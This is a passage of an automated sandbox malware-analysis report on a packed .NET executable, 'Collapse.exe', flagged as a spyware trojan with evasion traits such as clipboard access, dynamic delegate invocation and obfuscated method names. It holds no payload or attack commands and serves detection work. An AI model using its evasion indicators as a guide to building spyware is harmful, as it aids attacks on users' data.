                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_00441800 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,1_2_00441800
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_03B41000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,1_2_03B41000
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_00441800 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,1_2_00441800
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 0_2_019508700_2_01950870
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 0_2_019508600_2_01950860
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 0_2_01952D200_2_01952D20
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004398321_2_00439832
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0040D0D11_2_0040D0D1
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0042D8A71_2_0042D8A7
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004179101_2_00417910
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0040B9201_2_0040B920
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0044F1E01_2_0044F1E0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004129EA1_2_004129EA
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0042E2B11_2_0042E2B1
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0040EB1E1_2_0040EB1E
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0042C3801_2_0042C380
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0044A4601_2_0044A460
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0042D4EA1_2_0042D4EA
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0044FE401_2_0044FE40
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_00429E301_2_00429E30
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004316C01_2_004316C0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0041AF101_2_0041AF10
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0041BF191_2_0041BF19
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004467F01_2_004467F0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004010401_2_00401040
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0042E8501_2_0042E850
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0041C8531_2_0041C853
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0042D01E1_2_0042D01E
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0042A8301_2_0042A830
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0044B0301_2_0044B030
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0041D0DE1_2_0041D0DE
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004370F01_2_004370F0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004378F01_2_004378F0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004479401_2_00447940
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0043A14C1_2_0043A14C
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004251001_2_00425100
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004391131_2_00439113
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004481101_2_00448110
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0043491D1_2_0043491D
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004241201_2_00424120
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0043A93A1_2_0043A93A
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0043A1CB1_2_0043A1CB
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004329D31_2_004329D3
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004259D01_2_004259D0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0043E9D01_2_0043E9D0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004411E01_2_004411E0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0043D1B71_2_0043D1B7
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0043A1B41_2_0043A1B4
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_00408A401_2_00408A40
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0040A2201_2_0040A220
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_00444A281_2_00444A28
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_00402AC01_2_00402AC0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_00416ADA1_2_00416ADA
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0044FAE01_2_0044FAE0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_00445AE01_2_00445AE0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0040CA901_2_0040CA90
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004302A01_2_004302A0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0044EAA21_2_0044EAA2
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0042EB501_2_0042EB50
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0043AB701_2_0043AB70
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_00424B101_2_00424B10
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0044E3201_2_0044E320
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_00427B291_2_00427B29
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0044AB301_2_0044AB30
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004283371_2_00428337
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_00434BF01_2_00434BF0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0043DBA11_2_0043DBA1
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_00430BA01_2_00430BA0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004094401_2_00409440
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0044E4101_2_0044E410
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0040BC301_2_0040BC30
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_00421C301_2_00421C30
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_00423C351_2_00423C35
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004034F01_2_004034F0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004174F31_2_004174F3
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_00431CF01_2_00431CF0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0041CC8B1_2_0041CC8B
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004454AA1_2_004454AA
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_00407D401_2_00407D40
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_00445D401_2_00445D40
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0041FD481_2_0041FD48
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004345001_2_00434500
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0043CD1E1_2_0043CD1E
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004415201_2_00441520
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0042ED311_2_0042ED31
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004485391_2_00448539
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0042FDC01_2_0042FDC0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_00426DD01_2_00426DD0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0040C5901_2_0040C590
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0044DD961_2_0044DD96
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_00424DA01_2_00424DA0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_00412DA21_2_00412DA2
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0043564C1_2_0043564C
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_00434E761_2_00434E76
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0044BE0B1_2_0044BE0B
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0042AE301_2_0042AE30
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_00431ED11_2_00431ED1
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004386811_2_00438681
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_00403E901_2_00403E90
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0043C6971_2_0043C697
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004246A41_2_004246A4
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_00408EB01_2_00408EB0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0044CE161_2_0044CE16
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_00443F4A1_2_00443F4A
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0041BF631_2_0041BF63
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0041D7661_2_0041D766
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004047721_2_00404772
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_00406F761_2_00406F76
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004257101_2_00425710
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004217241_2_00421724
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0042C73A1_2_0042C73A
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_00439FCB1_2_00439FCB
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_00433FCC1_2_00433FCC
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0041E7D41_2_0041E7D4
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0040EFE01_2_0040EFE0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0044A7E01_2_0044A7E0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0040F7E71_2_0040F7E7
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_00428FF01_2_00428FF0
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004407F31_2_004407F3
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0044F7801_2_0044F780
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004107901_2_00410790
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: String function: 0041AF00 appears 91 times
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: String function: 0040B210 appears 46 times
                          Source: C:\Users\user\Desktop\Collapse.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 924
                          Source: Collapse.exe, 00000000.00000000.2033784220.0000000000F50000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePolitic.exe0 vs Collapse.exe
                          Source: Collapse.exe, 00000000.00000002.2232010629.00000000016DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Collapse.exe
                          Source: Collapse.exe, 00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePolitic.exe0 vs Collapse.exe
                          Source: Collapse.exeBinary or memory string: OriginalFilenamePolitic.exe0 vs Collapse.exe
                          Source: Collapse.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: Collapse.exeStatic PE information: Section: .CSS ZLIB complexity 1.0003250730742779
                          Source: Collapse.exe, ppuPHebcoIQOPplcqD.csCryptographic APIs: 'CreateDecryptor'
                          Source: Collapse.exe, ppuPHebcoIQOPplcqD.csCryptographic APIs: 'CreateDecryptor'
                          Source: 0.2.Collapse.exe.42f9550.0.raw.unpack, ppuPHebcoIQOPplcqD.csCryptographic APIs: 'CreateDecryptor'
                          Source: 0.2.Collapse.exe.42f9550.0.raw.unpack, ppuPHebcoIQOPplcqD.csCryptographic APIs: 'CreateDecryptor'
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/5@2/2
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_004467F0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,1_2_004467F0
                          Source: C:\Users\user\Desktop\Collapse.exeMutant created: NULL
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4760
                          Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\6b1c9201-6c7f-4345-a484-62783186cdcdJump to behavior
                          Source: Collapse.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: Collapse.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                          Source: C:\Users\user\Desktop\Collapse.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: Collapse.exeVirustotal: Detection: 55%
                          Source: C:\Users\user\Desktop\Collapse.exeFile read: C:\Users\user\Desktop\Collapse.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\Collapse.exe "C:\Users\user\Desktop\Collapse.exe"
                          Source: C:\Users\user\Desktop\Collapse.exeProcess created: C:\Users\user\Desktop\Collapse.exe "C:\Users\user\Desktop\Collapse.exe"
                          Source: C:\Users\user\Desktop\Collapse.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 924
                          Source: C:\Users\user\Desktop\Collapse.exeProcess created: C:\Users\user\Desktop\Collapse.exe "C:\Users\user\Desktop\Collapse.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: webio.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: Collapse.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: Collapse.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Collapse.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: Politic.pdb source: Collapse.exe, WER6334.tmp.dmp.4.dr
                          Source: Binary string: System.Windows.Forms.pdb source: WER6334.tmp.dmp.4.dr
                          Source: Binary string: mscorlib.pdb source: WER6334.tmp.dmp.4.dr
                          Source: Binary string: System.ni.pdbRSDS source: WER6334.tmp.dmp.4.dr
                          Source: Binary string: Politic.pdb$FXn source: WER6334.tmp.dmp.4.dr
                          Source: Binary string: mscorlib.ni.pdb source: WER6334.tmp.dmp.4.dr
                          Source: Binary string: System.pdb) source: WER6334.tmp.dmp.4.dr
                          Source: Binary string: mscorlib.ni.pdbRSDS source: WER6334.tmp.dmp.4.dr
                          Source: Binary string: System.ni.pdb source: WER6334.tmp.dmp.4.dr
                          Source: Binary string: System.pdb source: WER6334.tmp.dmp.4.dr

                          Data Obfuscation

                          barindex
                          .NET source code contains method to dynamically call methods (often used by packers)
                          Source: Collapse.exe, ppuPHebcoIQOPplcqD.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                          Source: 0.2.Collapse.exe.42f9550.0.raw.unpack, ppuPHebcoIQOPplcqD.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                          Source: Collapse.exeStatic PE information: 0xAFA985D8 [Wed May 23 05:10:48 2063 UTC]
                          Source: Collapse.exeStatic PE information: section name: .CSS
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_00454118 push esi; iretd 1_2_00454119
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0043FC59 push es; iretd 1_2_0043FC88
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0045240C push es; ret 1_2_0045240E
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0043D744 push ecx; ret 1_2_0043D745
                          Source: Collapse.exe, ppuPHebcoIQOPplcqD.csHigh entropy of concatenated method names: 'ykGPwgHwAO', 'nW4lBacjpc', 'B2KP3xokPn', 'gaTPYwoJ5G', 'TYLPxbKoYW', 'kO0PvR7N8F', 'U7V1BKO3PY', 'wWfQ2gHoY', 'yC1fpnZwL', 'Hw60rhVR9'
                          Source: Collapse.exe, qOk4Li1LtD7jcpHmh1s.csHigh entropy of concatenated method names: 'DOy1h9YEcI', 'idX1TUKobN', 'LiV1FpfZt0', 'i701KaU8Po', 'LUk1Dtqt7k', 'tWR1uNYEvx', 'drh1mtIfRg', 'toM1GSPObS', 'iMU1WPi3w9', 'tnJ146DGBh'
                          Source: 0.2.Collapse.exe.42f9550.0.raw.unpack, ppuPHebcoIQOPplcqD.csHigh entropy of concatenated method names: 'ykGPwgHwAO', 'nW4lBacjpc', 'B2KP3xokPn', 'gaTPYwoJ5G', 'TYLPxbKoYW', 'kO0PvR7N8F', 'U7V1BKO3PY', 'wWfQ2gHoY', 'yC1fpnZwL', 'Hw60rhVR9'
                          Source: 0.2.Collapse.exe.42f9550.0.raw.unpack, qOk4Li1LtD7jcpHmh1s.csHigh entropy of concatenated method names: 'DOy1h9YEcI', 'idX1TUKobN', 'LiV1FpfZt0', 'i701KaU8Po', 'LUk1Dtqt7k', 'tWR1uNYEvx', 'drh1mtIfRg', 'toM1GSPObS', 'iMU1WPi3w9', 'tnJ146DGBh'
                          Source: C:\Users\user\Desktop\Collapse.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
